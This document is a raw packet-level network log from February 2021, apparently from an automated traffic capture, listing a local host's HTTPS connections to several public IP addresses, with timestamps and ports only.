                                                                                                                                                          Feb 16, 2021 04:31:35.662014008 CET49753443192.168.2.389.46.91.28
                                                                                                                                                          Feb 16, 2021 04:31:35.662693977 CET49753443192.168.2.389.46.91.28
                                                                                                                                                          Feb 16, 2021 04:31:35.724652052 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:35.725912094 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:35.725955963 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:35.725990057 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:35.726064920 CET49753443192.168.2.389.46.91.28
                                                                                                                                                          Feb 16, 2021 04:31:35.732881069 CET49753443192.168.2.389.46.91.28
                                                                                                                                                          Feb 16, 2021 04:31:35.797997952 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:35.804549932 CET49753443192.168.2.389.46.91.28
                                                                                                                                                          Feb 16, 2021 04:31:35.804781914 CET49753443192.168.2.389.46.91.28
                                                                                                                                                          Feb 16, 2021 04:31:35.869869947 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:36.752545118 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:36.752598047 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:36.752734900 CET49753443192.168.2.389.46.91.28
                                                                                                                                                          Feb 16, 2021 04:31:36.752754927 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:36.752861977 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:36.752940893 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:36.752963066 CET49753443192.168.2.389.46.91.28
                                                                                                                                                          Feb 16, 2021 04:31:36.753052950 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:36.753086090 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:36.753180981 CET49753443192.168.2.389.46.91.28
                                                                                                                                                          Feb 16, 2021 04:31:36.753587008 CET49753443192.168.2.389.46.91.28
                                                                                                                                                          Feb 16, 2021 04:31:36.802212000 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:36.802259922 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:36.802901983 CET49753443192.168.2.389.46.91.28
                                                                                                                                                          Feb 16, 2021 04:31:36.815130949 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:36.815185070 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:36.815313101 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:36.815342903 CET49753443192.168.2.389.46.91.28
                                                                                                                                                          Feb 16, 2021 04:31:36.815373898 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:36.815376997 CET49753443192.168.2.389.46.91.28
                                                                                                                                                          Feb 16, 2021 04:31:36.815450907 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:36.815463066 CET49753443192.168.2.389.46.91.28
                                                                                                                                                          Feb 16, 2021 04:31:36.815510035 CET49753443192.168.2.389.46.91.28
                                                                                                                                                          Feb 16, 2021 04:31:36.841598034 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:36.841646910 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:36.841676950 CET49753443192.168.2.389.46.91.28
                                                                                                                                                          Feb 16, 2021 04:31:36.841712952 CET49753443192.168.2.389.46.91.28
                                                                                                                                                          Feb 16, 2021 04:31:36.841747046 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:36.841798067 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:36.841834068 CET49753443192.168.2.389.46.91.28
                                                                                                                                                          Feb 16, 2021 04:31:36.841885090 CET49753443192.168.2.389.46.91.28
                                                                                                                                                          Feb 16, 2021 04:31:36.841964006 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:36.842045069 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:36.842088938 CET49753443192.168.2.389.46.91.28
                                                                                                                                                          Feb 16, 2021 04:31:36.842088938 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:36.842116117 CET49753443192.168.2.389.46.91.28
                                                                                                                                                          Feb 16, 2021 04:31:36.842183113 CET49753443192.168.2.389.46.91.28
                                                                                                                                                          Feb 16, 2021 04:31:36.843466997 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:36.843508959 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:36.843539953 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:36.843564987 CET4434975389.46.91.28192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:36.843624115 CET49753443192.168.2.389.46.91.28
                                                                                                                                                          Feb 16, 2021 04:31:36.843692064 CET49753443192.168.2.389.46.91.28
                                                                                                                                                          Feb 16, 2021 04:31:36.843702078 CET49753443192.168.2.389.46.91.28
                                                                                                                                                          Feb 16, 2021 04:31:36.849004030 CET49754443192.168.2.3184.168.131.241
                                                                                                                                                          Feb 16, 2021 04:31:37.073637962 CET44349754184.168.131.241192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:37.075743914 CET49754443192.168.2.3184.168.131.241
                                                                                                                                                          Feb 16, 2021 04:31:37.077110052 CET49754443192.168.2.3184.168.131.241
                                                                                                                                                          Feb 16, 2021 04:31:37.301244020 CET44349754184.168.131.241192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:37.301455021 CET44349754184.168.131.241192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:37.301505089 CET44349754184.168.131.241192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:37.301533937 CET44349754184.168.131.241192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:37.301570892 CET44349754184.168.131.241192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:37.301659107 CET49754443192.168.2.3184.168.131.241
                                                                                                                                                          Feb 16, 2021 04:31:37.303138971 CET44349754184.168.131.241192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:37.303170919 CET44349754184.168.131.241192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:37.303822041 CET49754443192.168.2.3184.168.131.241
                                                                                                                                                          Feb 16, 2021 04:31:37.310012102 CET49754443192.168.2.3184.168.131.241
                                                                                                                                                          Feb 16, 2021 04:31:37.536705971 CET44349754184.168.131.241192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:37.546206951 CET49754443192.168.2.3184.168.131.241
                                                                                                                                                          Feb 16, 2021 04:31:37.633049011 CET49755443192.168.2.3136.243.147.81
                                                                                                                                                          Feb 16, 2021 04:31:37.707026958 CET44349755136.243.147.81192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:37.707145929 CET49755443192.168.2.3136.243.147.81
                                                                                                                                                          Feb 16, 2021 04:31:37.707756042 CET49755443192.168.2.3136.243.147.81
                                                                                                                                                          Feb 16, 2021 04:31:37.771909952 CET44349754184.168.131.241192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:37.773221016 CET49754443192.168.2.3184.168.131.241
                                                                                                                                                          Feb 16, 2021 04:31:37.779289007 CET44349755136.243.147.81192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:37.793904066 CET44349755136.243.147.81192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:37.793956041 CET44349755136.243.147.81192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:37.793991089 CET44349755136.243.147.81192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:37.794081926 CET49755443192.168.2.3136.243.147.81
                                                                                                                                                          Feb 16, 2021 04:31:37.808979988 CET49755443192.168.2.3136.243.147.81
                                                                                                                                                          Feb 16, 2021 04:31:37.880764008 CET44349755136.243.147.81192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:37.885144949 CET49755443192.168.2.3136.243.147.81
                                                                                                                                                          Feb 16, 2021 04:31:37.959177017 CET44349755136.243.147.81192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:37.959335089 CET49755443192.168.2.3136.243.147.81
                                                                                                                                                          Feb 16, 2021 04:31:38.055748940 CET49756443192.168.2.3188.165.53.185
                                                                                                                                                          Feb 16, 2021 04:31:38.107738972 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:38.107937098 CET49756443192.168.2.3188.165.53.185
                                                                                                                                                          Feb 16, 2021 04:31:38.108719110 CET49756443192.168.2.3188.165.53.185
                                                                                                                                                          Feb 16, 2021 04:31:38.162751913 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:38.162796021 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:38.162833929 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:38.162897110 CET49756443192.168.2.3188.165.53.185
                                                                                                                                                          Feb 16, 2021 04:31:38.167138100 CET49756443192.168.2.3188.165.53.185
                                                                                                                                                          Feb 16, 2021 04:31:38.219264030 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:38.224905968 CET49756443192.168.2.3188.165.53.185
                                                                                                                                                          Feb 16, 2021 04:31:38.224997997 CET49756443192.168.2.3188.165.53.185
                                                                                                                                                          Feb 16, 2021 04:31:38.277086020 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.664664030 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.664725065 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.664762974 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.664802074 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.664839983 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.664881945 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.664891005 CET49756443192.168.2.3188.165.53.185
                                                                                                                                                          Feb 16, 2021 04:31:39.664927959 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.664949894 CET49756443192.168.2.3188.165.53.185
                                                                                                                                                          Feb 16, 2021 04:31:39.664967060 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.665007114 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.665033102 CET49756443192.168.2.3188.165.53.185
                                                                                                                                                          Feb 16, 2021 04:31:39.665045023 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.665162086 CET49756443192.168.2.3188.165.53.185
                                                                                                                                                          Feb 16, 2021 04:31:39.665222883 CET49756443192.168.2.3188.165.53.185
                                                                                                                                                          Feb 16, 2021 04:31:39.717327118 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.717406988 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.717458963 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.717482090 CET49756443192.168.2.3188.165.53.185
                                                                                                                                                          Feb 16, 2021 04:31:39.717497110 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.717516899 CET49756443192.168.2.3188.165.53.185
                                                                                                                                                          Feb 16, 2021 04:31:39.717544079 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.717569113 CET49756443192.168.2.3188.165.53.185
                                                                                                                                                          Feb 16, 2021 04:31:39.717587948 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.717597008 CET49756443192.168.2.3188.165.53.185
                                                                                                                                                          Feb 16, 2021 04:31:39.717657089 CET49756443192.168.2.3188.165.53.185
                                                                                                                                                          Feb 16, 2021 04:31:39.717736006 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.717794895 CET49756443192.168.2.3188.165.53.185
                                                                                                                                                          Feb 16, 2021 04:31:39.717827082 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.717917919 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.717936039 CET49756443192.168.2.3188.165.53.185
                                                                                                                                                          Feb 16, 2021 04:31:39.718046904 CET49756443192.168.2.3188.165.53.185
                                                                                                                                                          Feb 16, 2021 04:31:39.718079090 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.718230963 CET49756443192.168.2.3188.165.53.185
                                                                                                                                                          Feb 16, 2021 04:31:39.718301058 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.718375921 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.718406916 CET49756443192.168.2.3188.165.53.185
                                                                                                                                                          Feb 16, 2021 04:31:39.718414068 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.718442917 CET49756443192.168.2.3188.165.53.185
                                                                                                                                                          Feb 16, 2021 04:31:39.718451023 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.718452930 CET49756443192.168.2.3188.165.53.185
                                                                                                                                                          Feb 16, 2021 04:31:39.718518972 CET49756443192.168.2.3188.165.53.185
                                                                                                                                                          Feb 16, 2021 04:31:39.718530893 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.718570948 CET44349756188.165.53.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.718628883 CET49756443192.168.2.3188.165.53.185
                                                                                                                                                          Feb 16, 2021 04:31:39.718728065 CET49756443192.168.2.3188.165.53.185
                                                                                                                                                          Feb 16, 2021 04:31:39.874394894 CET49757443192.168.2.385.234.145.174
                                                                                                                                                          Feb 16, 2021 04:31:39.933749914 CET4434975785.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.936065912 CET49757443192.168.2.385.234.145.174
                                                                                                                                                          Feb 16, 2021 04:31:39.936870098 CET49757443192.168.2.385.234.145.174
                                                                                                                                                          Feb 16, 2021 04:31:39.996037006 CET4434975785.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.996172905 CET4434975785.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.996220112 CET4434975785.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.996259928 CET4434975785.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.996315956 CET4434975785.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:39.996464014 CET49757443192.168.2.385.234.145.174
                                                                                                                                                          Feb 16, 2021 04:31:40.012118101 CET4434975785.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:40.021862030 CET49757443192.168.2.385.234.145.174
                                                                                                                                                          Feb 16, 2021 04:31:40.081648111 CET4434975785.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:40.088902950 CET49757443192.168.2.385.234.145.174
                                                                                                                                                          Feb 16, 2021 04:31:40.089122057 CET49757443192.168.2.385.234.145.174
                                                                                                                                                          Feb 16, 2021 04:31:40.150824070 CET4434975785.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:40.914031982 CET4434975785.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:40.914079905 CET4434975785.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:40.914160013 CET49757443192.168.2.385.234.145.174
                                                                                                                                                          Feb 16, 2021 04:31:40.914302111 CET49757443192.168.2.385.234.145.174
                                                                                                                                                          Feb 16, 2021 04:31:40.914364100 CET49757443192.168.2.385.234.145.174
                                                                                                                                                          Feb 16, 2021 04:31:40.973357916 CET4434975785.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:41.004180908 CET49758443192.168.2.385.234.145.174
                                                                                                                                                          Feb 16, 2021 04:31:41.065756083 CET4434975885.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:41.066102982 CET49758443192.168.2.385.234.145.174
                                                                                                                                                          Feb 16, 2021 04:31:41.066768885 CET49758443192.168.2.385.234.145.174
                                                                                                                                                          Feb 16, 2021 04:31:41.128216028 CET4434975885.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:41.128496885 CET4434975885.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:41.128612995 CET4434975885.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:41.128657103 CET4434975885.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:41.128684998 CET4434975885.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:41.128752947 CET49758443192.168.2.385.234.145.174
                                                                                                                                                          Feb 16, 2021 04:31:41.128778934 CET49758443192.168.2.385.234.145.174
                                                                                                                                                          Feb 16, 2021 04:31:41.145894051 CET4434975885.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:41.147990942 CET49758443192.168.2.385.234.145.174
                                                                                                                                                          Feb 16, 2021 04:31:41.209796906 CET4434975885.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:41.213052034 CET49758443192.168.2.385.234.145.174
                                                                                                                                                          Feb 16, 2021 04:31:41.310086012 CET4434975885.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:41.878940105 CET4434975885.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:41.878998995 CET4434975885.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:41.879038095 CET4434975885.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:41.879079103 CET4434975885.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:41.879117012 CET4434975885.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:41.879163980 CET4434975885.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:41.879209995 CET4434975885.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:41.879236937 CET49758443192.168.2.385.234.145.174
                                                                                                                                                          Feb 16, 2021 04:31:41.879249096 CET4434975885.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:41.879287958 CET4434975885.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:41.879302025 CET49758443192.168.2.385.234.145.174
                                                                                                                                                          Feb 16, 2021 04:31:41.879328012 CET4434975885.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:41.880080938 CET49758443192.168.2.385.234.145.174
                                                                                                                                                          Feb 16, 2021 04:31:41.940934896 CET4434975885.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:41.940987110 CET4434975885.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:41.941205025 CET49758443192.168.2.385.234.145.174
                                                                                                                                                          Feb 16, 2021 04:31:41.941853046 CET49758443192.168.2.385.234.145.174
                                                                                                                                                          Feb 16, 2021 04:31:42.003249884 CET4434975885.234.145.174192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:42.150703907 CET49759443192.168.2.379.137.75.185
                                                                                                                                                          Feb 16, 2021 04:31:42.205863953 CET4434975979.137.75.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:42.207403898 CET49759443192.168.2.379.137.75.185
                                                                                                                                                          Feb 16, 2021 04:31:42.207958937 CET49759443192.168.2.379.137.75.185
                                                                                                                                                          Feb 16, 2021 04:31:42.262645006 CET4434975979.137.75.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:42.278753042 CET4434975979.137.75.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:42.278798103 CET4434975979.137.75.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:42.278834105 CET4434975979.137.75.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:42.278976917 CET49759443192.168.2.379.137.75.185
                                                                                                                                                          Feb 16, 2021 04:31:42.286115885 CET49759443192.168.2.379.137.75.185
                                                                                                                                                          Feb 16, 2021 04:31:42.339014053 CET4434975979.137.75.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:42.344930887 CET49759443192.168.2.379.137.75.185
                                                                                                                                                          Feb 16, 2021 04:31:42.345266104 CET49759443192.168.2.379.137.75.185
                                                                                                                                                          Feb 16, 2021 04:31:42.397464037 CET4434975979.137.75.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:42.412090063 CET4434975979.137.75.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:42.412347078 CET49759443192.168.2.379.137.75.185
                                                                                                                                                          Feb 16, 2021 04:31:42.412420988 CET49759443192.168.2.379.137.75.185
                                                                                                                                                          Feb 16, 2021 04:31:42.412424088 CET4434975979.137.75.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:42.412453890 CET4434975979.137.75.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:42.412997961 CET49759443192.168.2.379.137.75.185
                                                                                                                                                          Feb 16, 2021 04:31:42.413027048 CET49759443192.168.2.379.137.75.185
                                                                                                                                                          Feb 16, 2021 04:31:42.464751959 CET4434975979.137.75.185192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:42.465087891 CET49759443192.168.2.379.137.75.185
                                                                                                                                                          Feb 16, 2021 04:31:42.486783981 CET49760443192.168.2.3185.107.227.241
                                                                                                                                                          Feb 16, 2021 04:31:42.556490898 CET44349760185.107.227.241192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:42.556847095 CET49760443192.168.2.3185.107.227.241
                                                                                                                                                          Feb 16, 2021 04:31:42.558842897 CET49760443192.168.2.3185.107.227.241
                                                                                                                                                          Feb 16, 2021 04:31:42.626877069 CET44349760185.107.227.241192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:42.628370047 CET44349760185.107.227.241192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:42.628413916 CET44349760185.107.227.241192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:42.628454924 CET44349760185.107.227.241192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:42.628465891 CET49760443192.168.2.3185.107.227.241
                                                                                                                                                          Feb 16, 2021 04:31:42.635817051 CET49760443192.168.2.3185.107.227.241
                                                                                                                                                          Feb 16, 2021 04:31:42.703772068 CET44349760185.107.227.241192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:42.710557938 CET49760443192.168.2.3185.107.227.241
                                                                                                                                                          Feb 16, 2021 04:31:42.710650921 CET49760443192.168.2.3185.107.227.241
                                                                                                                                                          Feb 16, 2021 04:31:42.782617092 CET44349760185.107.227.241192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:42.783052921 CET44349760185.107.227.241192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:42.783094883 CET44349760185.107.227.241192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:42.783127069 CET44349760185.107.227.241192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:42.783868074 CET49760443192.168.2.3185.107.227.241
                                                                                                                                                          Feb 16, 2021 04:31:42.784169912 CET49760443192.168.2.3185.107.227.241
                                                                                                                                                          Feb 16, 2021 04:31:42.784311056 CET49760443192.168.2.3185.107.227.241
                                                                                                                                                          Feb 16, 2021 04:31:42.853745937 CET44349760185.107.227.241192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:42.873210907 CET49761443192.168.2.3104.21.78.13
                                                                                                                                                          Feb 16, 2021 04:31:42.924509048 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:42.925100088 CET49761443192.168.2.3104.21.78.13
                                                                                                                                                          Feb 16, 2021 04:31:43.006515026 CET49761443192.168.2.3104.21.78.13
                                                                                                                                                          Feb 16, 2021 04:31:43.060271025 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.062542915 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.062586069 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.062623024 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.062876940 CET49761443192.168.2.3104.21.78.13
                                                                                                                                                          Feb 16, 2021 04:31:43.072117090 CET49761443192.168.2.3104.21.78.13
                                                                                                                                                          Feb 16, 2021 04:31:43.123217106 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.123303890 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.130764961 CET49761443192.168.2.3104.21.78.13
                                                                                                                                                          Feb 16, 2021 04:31:43.130810022 CET49761443192.168.2.3104.21.78.13
                                                                                                                                                          Feb 16, 2021 04:31:43.181982040 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.182034016 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.897638083 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.897686958 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.897726059 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.897763968 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.897802114 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.897849083 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.897874117 CET49761443192.168.2.3104.21.78.13
                                                                                                                                                          Feb 16, 2021 04:31:43.897900105 CET49761443192.168.2.3104.21.78.13
                                                                                                                                                          Feb 16, 2021 04:31:43.898221970 CET49761443192.168.2.3104.21.78.13
                                                                                                                                                          Feb 16, 2021 04:31:43.898643970 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.898686886 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.898750067 CET49761443192.168.2.3104.21.78.13
                                                                                                                                                          Feb 16, 2021 04:31:43.898828030 CET49761443192.168.2.3104.21.78.13
                                                                                                                                                          Feb 16, 2021 04:31:43.899799109 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.899903059 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.900582075 CET49761443192.168.2.3104.21.78.13
                                                                                                                                                          Feb 16, 2021 04:31:43.901043892 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.901093006 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.902259111 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.902299881 CET49761443192.168.2.3104.21.78.13
                                                                                                                                                          Feb 16, 2021 04:31:43.902316093 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.902328968 CET49761443192.168.2.3104.21.78.13
                                                                                                                                                          Feb 16, 2021 04:31:43.902370930 CET49761443192.168.2.3104.21.78.13
                                                                                                                                                          Feb 16, 2021 04:31:43.903525114 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.903565884 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.904707909 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.904747009 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.904838085 CET49761443192.168.2.3104.21.78.13
                                                                                                                                                          Feb 16, 2021 04:31:43.905880928 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.905920982 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.905991077 CET49761443192.168.2.3104.21.78.13
                                                                                                                                                          Feb 16, 2021 04:31:43.907089949 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.907130003 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.908317089 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.908417940 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.909553051 CET44349761104.21.78.13192.168.2.3
                                                                                                                                                          Feb 16, 2021 04:31:43.909617901 CET49761443192.168.2.3104.21.78.13
                                                                                                                                                          Feb 16, 2021 04:31:43.909686089 CET44349761104.21.78.13192.168.2.3
